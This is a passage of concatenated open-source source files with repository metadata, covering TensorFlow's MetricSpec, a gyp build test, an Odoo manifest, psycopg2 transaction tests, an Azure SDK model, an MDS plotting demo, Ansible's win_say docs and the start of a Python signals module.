      metric_fn_name, args, _WEIGHTS_ARGS, _CANONICAL_WEIGHTS_ARG,
      is_weights_required)
  # pylint: disable=invalid-name
  if labels_arg:
    if predictions_arg:
      # Both labels and predictions are named args.
      def _named_metric_fn(
          _sentinel=None, labels=None, predictions=None, weights=None):
        _assert_named_args(_sentinel)
        kwargs = {
            labels_arg: labels,
            predictions_arg: predictions,
        }
        if weights is not None:
          kwargs[weights_arg] = weights
        return metric_fn(**kwargs)
      return _named_metric_fn
    if labels_arg == args[0]:
      # labels is a named arg, and first. predictions is not a named arg, so we
      # want to pass it as the 2nd positional arg (i.e., the first non-labels
      # position), which means passing both positionally.
      def _positional_metric_fn(
          _sentinel=None, labels=None, predictions=None, weights=None):
        _assert_named_args(_sentinel)
        # TODO(ptucker): Should we support metrics that take only labels?
        # Currently, if you want streaming mean of a label, you have to wrap it
        # in a fn that takes discards predictions.
        if weights is None:
          return metric_fn(labels, predictions)
        return metric_fn(labels, predictions, **{weights_arg: weights})
      return _positional_metric_fn
    # labels is a named arg, and not first, so we pass predictions positionally
    # and labels by name.
    def _positional_predictions_metric_fn(
        _sentinel=None, labels=None, predictions=None, weights=None):
      _assert_named_args(_sentinel)
      kwargs = {
          labels_arg: labels,
      }
      if weights is not None:
        kwargs[weights_arg] = weights
      return metric_fn(predictions, **kwargs)
    return _positional_predictions_metric_fn
  if predictions_arg:
    # No labels, and predictions is named, so we pass the latter as a named arg.
    def _named_no_labels_metric_fn(
        _sentinel=None, labels=None, predictions=None, weights=None):
      del labels
      _assert_named_args(_sentinel)
      kwargs = {
          predictions_arg: predictions,
      }
      # TODO(ptucker): Should we allow weights with no labels?
      if weights is not None:
        kwargs[weights_arg] = weights
      return metric_fn(**kwargs)
    return _named_no_labels_metric_fn
  # Neither labels nor predictions are named, so we just pass predictions as the
  # first arg.
  def _positional_no_labels_metric_fn(
      _sentinel=None, labels=None, predictions=None, weights=None):
    del labels
    _assert_named_args(_sentinel)
    if weights is None:
      return metric_fn(predictions)
    # TODO(ptucker): Should we allow weights with no labels?
    return metric_fn(predictions, **{weights_arg: weights})
  return _positional_no_labels_metric_fn
class MetricSpec(object):
  """Binds a metric function to the tensors produced by a model.

  A `MetricSpec` records everything `Estimator.evaluate` needs in order to
  feed the right `predictions`, `labels` and (optionally) `weights` tensors
  into a metric function: the function itself, plus the dict keys under
  which each tensor can be found.

  Instances are passed in the `metrics` argument of `Estimator.evaluate`.
  While building the evaluation ops, the `Estimator` calls
  `create_metric_ops`, which wires the stored `metric_fn` to the model as
  described in that method's docstring and returns the metric.

  Example:

  Suppose a model's input function returns inputs containing (among other
  things) a tensor under key "input_key" and a labels dict containing
  "label_key", and its `model_fn` emits a prediction under
  "prediction_key".  The accuracy of that prediction is requested by adding

  ```
  "prediction accuracy": MetricSpec(metric_fn=prediction_accuracy_fn,
                                    prediction_key="prediction_key",
                                    label_key="label_key")
  ```

  to the metrics argument of `evaluate`.  `prediction_accuracy_fn` can be a
  predefined function from metric_ops (e.g., `streaming_accuracy`) or a
  custom function you define.

  To weight the accuracy by "input_key", add it as the `weight_key`:

  ```
  "prediction accuracy": MetricSpec(metric_fn=prediction_accuracy_fn,
                                    prediction_key="prediction_key",
                                    label_key="label_key",
                                    weight_key="input_key")
  ```

  An end-to-end example:

  ```
  estimator = tf.contrib.learn.Estimator(...)
  estimator.fit(...)
  _ = estimator.evaluate(
      input_fn=input_fn,
      steps=1,
      metrics={
          'prediction accuracy':
              metric_spec.MetricSpec(
                  metric_fn=prediction_accuracy_fn,
                  prediction_key="prediction_key",
                  label_key="label_key")
      })
  ```
  """

  def __init__(self,
               metric_fn,
               prediction_key=None,
               label_key=None,
               weight_key=None):
    """Constructor.

    Creates a MetricSpec.

    Args:
      metric_fn: A function to use as a metric. See `_adapt_metric_fn` for
        rules on how `predictions`, `labels`, and `weights` are passed to
        this function. This must return either a single `Tensor`, which is
        interpreted as a value of this metric, or a pair
        `(value_op, update_op)`, where `value_op` is the op to call to
        obtain the value of the metric, and `update_op` should be run for
        each batch to update internal state.
      prediction_key: The key for a tensor in the `predictions` dict (output
        from the `model_fn`) to use as the `predictions` input to the
        `metric_fn`. Optional. If `None`, the `model_fn` must return a
        single tensor or a dict with only a single entry as `predictions`.
      label_key: The key for a tensor in the `labels` dict (output from the
        `input_fn`) to use as the `labels` input to the `metric_fn`.
        Optional. If `None`, the `input_fn` must return a single tensor or a
        dict with only a single entry as `labels`.
      weight_key: The key for a tensor in the `inputs` dict (output from the
        `input_fn`) to use as the `weights` input to the `metric_fn`.
        Optional. If `None`, no weights will be passed to the `metric_fn`.
    """
    self._metric_fn_name = _fn_name(metric_fn)
    # Wrap metric_fn so that it can always be invoked with the canonical
    # named args `labels`, `predictions` and `weights`, whatever argument
    # names and positions metric_fn itself declares.
    self._metric_fn = _adapt_metric_fn(
        metric_fn=metric_fn,
        metric_fn_name=self._metric_fn_name,
        is_labels_required=label_key is not None,
        is_weights_required=weight_key is not None)
    self._prediction_key = prediction_key
    self._label_key = label_key
    self._weight_key = weight_key

  @property
  def prediction_key(self):
    """Key of the predictions tensor, or `None` if a single tensor is used."""
    return self._prediction_key

  @property
  def label_key(self):
    """Key of the labels tensor, or `None` if a single tensor is used."""
    return self._label_key

  @property
  def weight_key(self):
    """Key of the weights tensor, or `None` if no weights are passed."""
    return self._weight_key

  @property
  def metric_fn(self):
    """Metric function.

    This function accepts named args: `predictions`, `labels`, `weights`. It
    returns a single `Tensor` or `(value_op, update_op)` pair. See the
    `metric_fn` constructor argument for more details.

    Returns:
      Function, see `metric_fn` constructor argument for more details.
    """
    return self._metric_fn

  def __str__(self):
    return ('MetricSpec(metric_fn=%s, prediction_key=%s, label_key=%s, '
            'weight_key=%s)' % (self._metric_fn_name, self.prediction_key,
                                self.label_key, self.weight_key))

  def create_metric_ops(self, inputs, labels, predictions):
    """Connect our `metric_fn` to the specified members of the given dicts.

    This function will call the `metric_fn` given in our constructor as
    follows:

    ```
      metric_fn(predictions[self.prediction_key],
                labels[self.label_key],
                weights=weights[self.weight_key])
    ```

    And returns the result. The `weights` argument is only passed if
    `self.weight_key` is not `None`.

    `predictions` and `labels` may be single tensors as well as dicts. If
    `predictions` is a single tensor, `self.prediction_key` must be `None`.
    If `predictions` is a single element dict, `self.prediction_key` is
    allowed to be `None`. Conversely, if `labels` is a single tensor,
    `self.label_key` must be `None`. If `labels` is a single element dict,
    `self.label_key` is allowed to be `None`.

    Args:
      inputs: A dict of inputs produced by the `input_fn`
      labels: A dict of labels or a single label tensor produced by the
        `input_fn`.
      predictions: A dict of predictions or a single tensor produced by the
        `model_fn`.

    Returns:
      The result of calling `metric_fn`.

    Raises:
      ValueError: If `predictions` or `labels` is a single `Tensor` and
        `self.prediction_key` or `self.label_key` is not `None`; or if
        `self.label_key` is `None` but `labels` is a dict with more than one
        element, or if `self.prediction_key` is `None` but `predictions` is
        a dict with more than one element.
    """

    def _extract(name, dict_or_tensor, key):
      """Pick the tensor for `key` out of `dict_or_tensor`, or raise."""
      if key:
        # A key was configured: the corresponding argument must be a dict
        # actually containing that key.
        if not isinstance(dict_or_tensor, dict):
          raise ValueError(
              'MetricSpec with %s_key specified requires %ss dict, got '
              '%s.\nYou must not provide a %s_key if you only have a '
              'single Tensor as %ss.'
              % (name, name, dict_or_tensor, name, name))
        if key not in dict_or_tensor:
          raise KeyError(
              'Key \'%s\' missing from %s.' % (key, dict_or_tensor.keys()))
        return dict_or_tensor[key]
      # No key configured: accept a bare tensor, or a dict with exactly one
      # entry whose single value is used.
      if isinstance(dict_or_tensor, dict):
        if len(dict_or_tensor) != 1:
          raise ValueError(
              'MetricSpec without specified %s_key requires %ss tensor '
              'or single element dict, got %s'
              % (name, name, dict_or_tensor))
        return next(six.itervalues(dict_or_tensor))
      return dict_or_tensor

    prediction = _extract('prediction', predictions, self.prediction_key)
    label = _extract('label', labels, self.label_key)
    try:
      return self.metric_fn(
          labels=label,
          predictions=prediction,
          weights=inputs[self.weight_key] if self.weight_key else None)
    except Exception as ex:
      # Log which spec failed before propagating, to ease debugging of
      # mis-wired metric configurations.
      logging.error('Could not create metric ops for %s, %s.' % (self, ex))
      raise
| apache-2.0 |
Godmaster49/mtasa-blue | vendor/google-breakpad/src/tools/gyp/test/mac/gyptest-xcode-gcc-clang.py | 254 | 1403 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that xcode-style GCC_... settings that require clang are handled
properly.
"""
import TestGyp
import os
import sys
if sys.platform == 'darwin':
  # These GCC_* xcode settings are only meaningful on Mac, so the whole
  # test body is gated on darwin.
  test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])
  CHDIR = 'xcode-gcc'
  test.run_gyp('test-clang.gyp', chdir=CHDIR)
  # aliasing_yes is expected to print "1" and aliasing_no to print "0":
  # the build must honour the strict-aliasing setting of each target.
  test.build('test-clang.gyp', 'aliasing_yes', chdir=CHDIR)
  test.run_built_executable('aliasing_yes', chdir=CHDIR, stdout="1\n")
  test.build('test-clang.gyp', 'aliasing_no', chdir=CHDIR)
  test.run_built_executable('aliasing_no', chdir=CHDIR, stdout="0\n")
  # The default behavior changed: strict aliasing used to be off, now it's on
  # by default. The important part is that this is identical for all generators
  # (which it is). TODO(thakis): Enable this once the bots have a newer Xcode.
  #test.build('test-clang.gyp', 'aliasing_default', chdir=CHDIR)
  #test.run_built_executable('aliasing_default', chdir=CHDIR, stdout="1\n")
  # For now, just check the generated ninja file: the default target must not
  # have an explicit strict-aliasing flag at all.
  if test.format == 'ninja':
    contents = open(test.built_file_path('obj/aliasing_default.ninja',
                                         chdir=CHDIR)).read()
    if 'strict-aliasing' in contents:
      test.fail_test()
  test.pass_test()
| gpl-3.0 |
ncliam/serverpos | openerp/addons/website_forum/__openerp__.py | 321 | 1905 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Forum',
'category': 'Website',
'summary': 'Forum, FAQ, Q&A',
'version': '1.0',
'description': """
Ask questions, get answers, no distractions
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/community-builder',
'depends': [
'auth_signup',
'gamification',
'website_mail',
'website_partner'
],
'data': [
'data/forum_data.xml',
'views/forum.xml',
'views/res_users.xml',
'views/website_forum.xml',
'views/ir_qweb.xml',
'security/ir.model.access.csv',
'data/badges_question.xml',
'data/badges_answer.xml',
'data/badges_participation.xml',
'data/badges_moderation.xml',
],
'qweb': [
'static/src/xml/*.xml'
],
'demo': [
'data/forum_demo.xml',
],
'installable': True,
'application': True,
}
| agpl-3.0 |
Amechi101/concepteur-market-app | venv/lib/python2.7/site-packages/psycopg2/tests/test_transaction.py | 62 | 9214 | #!/usr/bin/env python
# test_transaction - unit test on transaction behaviour
#
# Copyright (C) 2007-2011 Federico Di Gregorio <fog@debian.org>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import threading
from testutils import unittest, ConnectingTestCase, skip_before_postgres
import psycopg2
from psycopg2.extensions import (
ISOLATION_LEVEL_SERIALIZABLE, STATUS_BEGIN, STATUS_READY)
class TransactionTests(ConnectingTestCase):
    # Commit/rollback semantics on a serializable connection.  table2 has a
    # DEFERRABLE foreign key to table1 so test_failed_commit can force the
    # constraint check to happen (and fail) at COMMIT time.

    def setUp(self):
        ConnectingTestCase.setUp(self)
        self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
        curs = self.conn.cursor()
        curs.execute('''
            CREATE TEMPORARY TABLE table1 (
              id int PRIMARY KEY
            )''')
        # The constraint is set to deferrable for the commit_failed test
        curs.execute('''
            CREATE TEMPORARY TABLE table2 (
              id int PRIMARY KEY,
              table1_id int,
              CONSTRAINT table2__table1_id__fk
                FOREIGN KEY (table1_id) REFERENCES table1(id) DEFERRABLE)''')
        curs.execute('INSERT INTO table1 VALUES (1)')
        curs.execute('INSERT INTO table2 VALUES (1, 1)')
        self.conn.commit()

    def test_rollback(self):
        # Test that rollback undoes changes
        curs = self.conn.cursor()
        curs.execute('INSERT INTO table2 VALUES (2, 1)')
        # Rollback takes us from BEGIN state to READY state
        self.assertEqual(self.conn.status, STATUS_BEGIN)
        self.conn.rollback()
        self.assertEqual(self.conn.status, STATUS_READY)
        curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2')
        self.assertEqual(curs.fetchall(), [])

    def test_commit(self):
        # Test that commit stores changes
        curs = self.conn.cursor()
        curs.execute('INSERT INTO table2 VALUES (2, 1)')
        # Commit takes us from BEGIN state to READY state
        self.assertEqual(self.conn.status, STATUS_BEGIN)
        self.conn.commit()
        self.assertEqual(self.conn.status, STATUS_READY)
        # Now rollback and show that the new record is still there:
        self.conn.rollback()
        curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2')
        self.assertEqual(curs.fetchall(), [(2, 1)])

    def test_failed_commit(self):
        # Test that we can recover from a failed commit.
        # We use a deferred constraint to cause a failure on commit.
        curs = self.conn.cursor()
        curs.execute('SET CONSTRAINTS table2__table1_id__fk DEFERRED')
        # table1_id=42 violates the FK, but the check is deferred to commit.
        curs.execute('INSERT INTO table2 VALUES (2, 42)')
        # The commit should fail, and move the cursor back to READY state
        self.assertEqual(self.conn.status, STATUS_BEGIN)
        self.assertRaises(psycopg2.IntegrityError, self.conn.commit)
        self.assertEqual(self.conn.status, STATUS_READY)
        # The connection should be ready to use for the next transaction:
        curs.execute('SELECT 1')
        self.assertEqual(curs.fetchone()[0], 1)
class DeadlockSerializationTests(ConnectingTestCase):
    """Test deadlock and serialization failure errors.

    Two worker threads are synchronized with events so their transactions
    overlap deterministically; exactly one of them is expected to fail with
    TransactionRollbackError.
    """

    def connect(self):
        # Serializable isolation is what makes both the deadlock and the
        # serialization-failure scenarios below reproducible.
        conn = ConnectingTestCase.connect(self)
        conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
        return conn

    def setUp(self):
        ConnectingTestCase.setUp(self)
        curs = self.conn.cursor()

        # Drop table if it already exists (e.g. left over from an earlier
        # aborted run).  A failed DROP puts the transaction in an error
        # state, so roll back before continuing.
        try:
            curs.execute("DROP TABLE table1")
            self.conn.commit()
        except psycopg2.DatabaseError:
            self.conn.rollback()
        try:
            curs.execute("DROP TABLE table2")
            self.conn.commit()
        except psycopg2.DatabaseError:
            self.conn.rollback()

        # Create sample data
        curs.execute("""
            CREATE TABLE table1 (
              id int PRIMARY KEY,
              name text)
        """)
        curs.execute("INSERT INTO table1 VALUES (1, 'hello')")
        curs.execute("CREATE TABLE table2 (id int PRIMARY KEY)")
        self.conn.commit()

    def tearDown(self):
        curs = self.conn.cursor()
        curs.execute("DROP TABLE table1")
        curs.execute("DROP TABLE table2")
        self.conn.commit()
        ConnectingTestCase.tearDown(self)

    def test_deadlock(self):
        self.thread1_error = self.thread2_error = None
        step1 = threading.Event()
        step2 = threading.Event()

        def task1():
            # Locks table1 then table2: the mirror image of task2, so once
            # both threads hold their first lock they deadlock on the second.
            conn = None
            try:
                conn = self.connect()
                curs = conn.cursor()
                curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE")
                step1.set()
                step2.wait()
                curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE")
            except psycopg2.DatabaseError as exc:
                self.thread1_error = exc
                # Release the other thread even on failure, or it would
                # wait on step1 forever.
                step1.set()
            if conn is not None:
                conn.close()

        def task2():
            conn = None
            try:
                conn = self.connect()
                curs = conn.cursor()
                step1.wait()
                curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE")
                step2.set()
                curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE")
            except psycopg2.DatabaseError as exc:
                self.thread2_error = exc
                step2.set()
            if conn is not None:
                conn.close()

        # Run the threads in parallel. The "step1" and "step2" events
        # ensure that the two transactions overlap.
        thread1 = threading.Thread(target=task1)
        thread2 = threading.Thread(target=task2)
        thread1.start()
        thread2.start()
        thread1.join()
        thread2.join()

        # Exactly one of the threads should have failed with
        # TransactionRollbackError:
        self.assertFalse(self.thread1_error and self.thread2_error)
        error = self.thread1_error or self.thread2_error
        self.assertTrue(isinstance(
            error, psycopg2.extensions.TransactionRollbackError))

    def test_serialisation_failure(self):
        self.thread1_error = self.thread2_error = None
        step1 = threading.Event()
        step2 = threading.Event()

        def task1():
            # Reads the row, lets task2 update and commit it, then tries to
            # update the same row -- a serialization failure for one of them.
            conn = None
            try:
                conn = self.connect()
                curs = conn.cursor()
                curs.execute("SELECT name FROM table1 WHERE id = 1")
                curs.fetchall()
                step1.set()
                step2.wait()
                curs.execute("UPDATE table1 SET name='task1' WHERE id = 1")
                conn.commit()
            except psycopg2.DatabaseError as exc:
                self.thread1_error = exc
                step1.set()
            if conn is not None:
                conn.close()

        def task2():
            conn = None
            try:
                conn = self.connect()
                curs = conn.cursor()
                step1.wait()
                curs.execute("UPDATE table1 SET name='task2' WHERE id = 1")
                conn.commit()
            except psycopg2.DatabaseError as exc:
                self.thread2_error = exc
            # Always release task1, whether or not our update succeeded.
            step2.set()
            if conn is not None:
                conn.close()

        # Run the threads in parallel. The "step1" and "step2" events
        # ensure that the two transactions overlap.
        thread1 = threading.Thread(target=task1)
        thread2 = threading.Thread(target=task2)
        thread1.start()
        thread2.start()
        thread1.join()
        thread2.join()

        # Exactly one of the threads should have failed with
        # TransactionRollbackError:
        self.assertFalse(self.thread1_error and self.thread2_error)
        error = self.thread1_error or self.thread2_error
        self.assertTrue(isinstance(
            error, psycopg2.extensions.TransactionRollbackError))
class QueryCancellationTests(ConnectingTestCase):
    """Tests for query cancellation."""

    def setUp(self):
        ConnectingTestCase.setUp(self)
        self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)

    # statement_timeout behaviour needed here requires PostgreSQL >= 8.2,
    # hence the skip decorator.
    @skip_before_postgres(8, 2)
    def test_statement_timeout(self):
        curs = self.conn.cursor()
        # Set a low statement timeout, then sleep for a longer period.
        # (10 is interpreted by PostgreSQL as milliseconds.)
        curs.execute('SET statement_timeout TO 10')
        self.assertRaises(psycopg2.extensions.QueryCanceledError,
                          curs.execute, 'SELECT pg_sleep(50)')
def test_suite():
    # Delegate to the loader so any TestCase class defined in this module
    # is collected automatically.
    loader = unittest.TestLoader()
    return loader.loadTestsFromName(__name__)


if __name__ == "__main__":
    unittest.main()
| mit |
AutorestCI/azure-sdk-for-python | azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/account/models/capability_information.py | 1 | 2346 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CapabilityInformation(Model):
    """Subscription-level properties and limits for Data Lake Analytics.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar subscription_id: the subscription credentials that uniquely
     identifies the subscription.
    :vartype subscription_id: str
    :ivar state: the subscription state. Possible values include:
     'Registered', 'Suspended', 'Deleted', 'Unregistered', 'Warned'
    :vartype state: str or
     ~azure.mgmt.datalake.analytics.account.models.SubscriptionState
    :ivar max_account_count: the maximum supported number of accounts under
     this subscription.
    :vartype max_account_count: int
    :ivar account_count: the current number of accounts under this
     subscription.
    :vartype account_count: int
    :ivar migration_state: the Boolean value of true or false to indicate the
     maintenance state.
    :vartype migration_state: bool
    """

    # Every field is server-populated, hence marked readonly so the msrest
    # serializer never sends it in a request body.
    _validation = {
        'subscription_id': {'readonly': True},
        'state': {'readonly': True},
        'max_account_count': {'readonly': True},
        'account_count': {'readonly': True},
        'migration_state': {'readonly': True},
    }

    # Maps Python attribute names to the wire (JSON) keys and types used by
    # the msrest (de)serializer.
    _attribute_map = {
        'subscription_id': {'key': 'subscriptionId', 'type': 'str'},
        'state': {'key': 'state', 'type': 'str'},
        'max_account_count': {'key': 'maxAccountCount', 'type': 'int'},
        'account_count': {'key': 'accountCount', 'type': 'int'},
        'migration_state': {'key': 'migrationState', 'type': 'bool'},
    }

    def __init__(self):
        super(CapabilityInformation, self).__init__()
        # All values stay None until a service response is deserialized
        # onto the instance.
        self.subscription_id = None
        self.state = None
        self.max_account_count = None
        self.account_count = None
        self.migration_state = None
| mit |
M4573R/BuildingMachineLearningSystemsWithPython | ch11/demo_mds.py | 25 | 3724 | # This code is supporting material for the book
# Building Machine Learning Systems with Python
# by Willi Richert and Luis Pedro Coelho
# published by PACKT Publishing
#
# It is made available under the MIT License
import os
import numpy as np
from matplotlib import pylab
from mpl_toolkits.mplot3d import Axes3D
from sklearn import linear_model, manifold, decomposition, datasets
# NOTE(review): `logistic` is created but never used anywhere below --
# candidate for removal.
logistic = linear_model.LogisticRegression()

from utils import CHART_DIR

# Fix the RNG seed so repeated runs produce the same charts (presumably
# because the MDS embedding below is initialisation-dependent -- confirm).
np.random.seed(3)

# all examples will have three classes in this file
colors = ['r', 'g', 'b']
markers = ['o', 6, '*']  # 6 is an integer matplotlib marker code
def plot_demo_1():
    """Embed a toy 3-class data set with MDS in 3D and 2D and save the chart.

    The chart (two side-by-side panels) is written to
    CHART_DIR/mds_demo_1.png.
    """
    # Three well-separated points, repeated along 5 feature dimensions; one
    # class per point.
    X = np.c_[np.ones(5), 2 * np.ones(5), 10 * np.ones(5)].T
    y = np.array([0, 1, 2])

    def _scatter_classes(ax, Xtrans, three_d):
        # One scatter call per class so every class gets its own
        # color/marker pair from the module-level lists.
        for cl, color, marker in zip(np.unique(y), colors, markers):
            pts = Xtrans[y == cl]
            if three_d:
                ax.scatter(pts[:, 0], pts[:, 1], pts[:, 2],
                           c=color, marker=marker, edgecolor='black')
            else:
                ax.scatter(pts[:, 0], pts[:, 1],
                           c=color, marker=marker, edgecolor='black')

    fig = pylab.figure(figsize=(10, 4))

    # Left panel: 3-dimensional MDS embedding.
    ax = fig.add_subplot(121, projection='3d')
    ax.set_axis_bgcolor('white')
    mds = manifold.MDS(n_components=3)
    Xtrans = mds.fit_transform(X)
    _scatter_classes(ax, Xtrans, three_d=True)
    pylab.title("MDS on example data set in 3 dimensions")
    ax.view_init(10, -15)

    # Right panel: 2-dimensional MDS embedding.
    mds = manifold.MDS(n_components=2)
    Xtrans = mds.fit_transform(X)
    ax = fig.add_subplot(122)
    _scatter_classes(ax, Xtrans, three_d=False)
    pylab.title("MDS on example data set in 2 dimensions")

    filename = "mds_demo_1.png"
    pylab.savefig(os.path.join(CHART_DIR, filename), bbox_inches="tight")
def plot_iris_mds():
    """Embed the Iris data set in 3D and 2D with both MDS and PCA.

    Writes two charts, each with a 3-dimensional and a 2-dimensional
    projection side by side: CHART_DIR/mds_demo_iris.png and
    CHART_DIR/pca_demo_iris.png.
    """
    iris = datasets.load_iris()
    X = iris.data
    y = iris.target

    def _scatter_classes(ax, Xtrans, three_d):
        # One scatter call per class so every class gets its own
        # color/marker pair from the module-level lists.
        for cl, color, marker in zip(np.unique(y), colors, markers):
            pts = Xtrans[y == cl]
            if three_d:
                ax.scatter(pts[:, 0], pts[:, 1], pts[:, 2],
                           c=color, marker=marker, edgecolor='black')
            else:
                ax.scatter(pts[:, 0], pts[:, 1],
                           c=color, marker=marker, edgecolor='black')

    # MDS
    fig = pylab.figure(figsize=(10, 4))

    ax = fig.add_subplot(121, projection='3d')
    ax.set_axis_bgcolor('white')
    mds = manifold.MDS(n_components=3)
    Xtrans = mds.fit_transform(X)
    _scatter_classes(ax, Xtrans, three_d=True)
    pylab.title("MDS on Iris data set in 3 dimensions")
    ax.view_init(10, -15)

    mds = manifold.MDS(n_components=2)
    Xtrans = mds.fit_transform(X)
    ax = fig.add_subplot(122)
    _scatter_classes(ax, Xtrans, three_d=False)
    pylab.title("MDS on Iris data set in 2 dimensions")

    filename = "mds_demo_iris.png"
    pylab.savefig(os.path.join(CHART_DIR, filename), bbox_inches="tight")

    # PCA
    fig = pylab.figure(figsize=(10, 4))

    ax = fig.add_subplot(121, projection='3d')
    ax.set_axis_bgcolor('white')
    pca = decomposition.PCA(n_components=3)
    Xtrans = pca.fit(X).transform(X)
    _scatter_classes(ax, Xtrans, three_d=True)
    pylab.title("PCA on Iris data set in 3 dimensions")
    ax.view_init(50, -35)

    pca = decomposition.PCA(n_components=2)
    Xtrans = pca.fit_transform(X)
    ax = fig.add_subplot(122)
    _scatter_classes(ax, Xtrans, three_d=False)
    pylab.title("PCA on Iris data set in 2 dimensions")

    filename = "pca_demo_iris.png"
    pylab.savefig(os.path.join(CHART_DIR, filename), bbox_inches="tight")
if __name__ == '__main__':
    # Generate both demo charts when run as a script.
    plot_demo_1()
    plot_iris_mds()
| mit |
marc-sensenich/ansible | lib/ansible/modules/windows/win_say.py | 14 | 4157 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2016, Jon Hawkesworth (@jhawkesworth) <figs@unity.demon.co.uk>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
# Ansible module metadata: development status and support tier, consumed by
# ansible-doc and the module index.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}

# The DOCUMENTATION / EXAMPLES / RETURN strings below are YAML payloads
# parsed by ansible-doc; they describe the PowerShell implementation that
# lives in the .ps1 file of the same name, and must remain valid YAML.
DOCUMENTATION = r'''
---
module: win_say
version_added: "2.3"
short_description: Text to speech module for Windows to speak messages and optionally play sounds
description:
    - Uses .NET libraries to convert text to speech and optionally play .wav sounds. Audio Service needs to be running and some kind of speakers or
      headphones need to be attached to the windows target(s) for the speech to be audible.
options:
  msg:
    description:
      - The text to be spoken.
      - Use either C(msg) or C(msg_file).
      - Optional so that you can use this module just to play sounds.
    type: str
  msg_file:
    description:
      - Full path to a windows format text file containing the text to be spoken.
      - Use either C(msg) or C(msg_file).
      - Optional so that you can use this module just to play sounds.
    type: path
  voice:
    description:
      - Which voice to use. See notes for how to discover installed voices.
      - If the requested voice is not available the default voice will be used.
        Example voice names from Windows 10 are C(Microsoft Zira Desktop) and C(Microsoft Hazel Desktop).
    type: str
    default: system default voice
  speech_speed:
    description:
      - How fast or slow to speak the text.
      - Must be an integer value in the range -10 to 10.
      - -10 is slowest, 10 is fastest.
    type: int
    default: 0
  start_sound_path:
    description:
      - Full path to a C(.wav) file containing a sound to play before the text is spoken.
      - Useful on conference calls to alert other speakers that ansible has something to say.
    type: path
  end_sound_path:
    description:
      - Full path to a C(.wav) file containing a sound to play after the text has been spoken.
      - Useful on conference calls to alert other speakers that ansible has finished speaking.
    type: path
notes:
  - Needs speakers or headphones to do anything useful.
  - |
    To find which voices are installed, run the following Powershell commands.

        Add-Type -AssemblyName System.Speech
        $speech = New-Object -TypeName System.Speech.Synthesis.SpeechSynthesizer
        $speech.GetInstalledVoices() | ForEach-Object { $_.VoiceInfo }
        $speech.Dispose()
  - Speech can be surprisingly slow, so it's best to keep message text short.
seealso:
- module: win_msg
- module: win_toast
author:
- Jon Hawkesworth (@jhawkesworth)
'''

EXAMPLES = r'''
- name: Warn of impending deployment
  win_say:
    msg: Warning, deployment commencing in 5 minutes, please log out.

- name: Using a different voice and a start sound
  win_say:
    start_sound_path: C:\Windows\Media\ding.wav
    msg: Warning, deployment commencing in 5 minutes, please log out.
    voice: Microsoft Hazel Desktop

- name: With start and end sound
  win_say:
    start_sound_path: C:\Windows\Media\Windows Balloon.wav
    msg: New software installed
    end_sound_path: C:\Windows\Media\chimes.wav

- name: Text from file example
  win_say:
    start_sound_path: C:\Windows\Media\Windows Balloon.wav
    msg_file: AppData\Local\Temp\morning_report.txt
    end_sound_path: C:\Windows\Media\chimes.wav
'''

RETURN = r'''
message_text:
    description: The text that the module attempted to speak.
    returned: success
    type: str
    sample: "Warning, deployment commencing in 5 minutes."
voice:
    description: The voice used to speak the text.
    returned: success
    type: str
    sample: Microsoft Hazel Desktop
voice_info:
    description: The voice used to speak the text.
    returned: when requested voice could not be loaded
    type: str
    sample: Could not load voice TestVoice, using system default voice
'''
| gpl-3.0 |
msfrank/Higgins | higgins/signals.py | 1 | 1459 | # Higgins - A multi-media server
# Copyright (c) 2007-2009 Michael Frank <msfrank@syntaxjockey.com>
#
# This program is free software; for license information see
# the COPYING file.
from twisted.internet.defer import Deferred
from higgins.logger import Loggable
class SignalDisconnected(Exception):
    """Errback reason delivered to a receiver removed via Signal.disconnect."""
class Signal(object, Loggable):
    """A one-shot multicast signal built on Twisted deferreds.

    Receivers call connect() and get back a Deferred that fires (at most
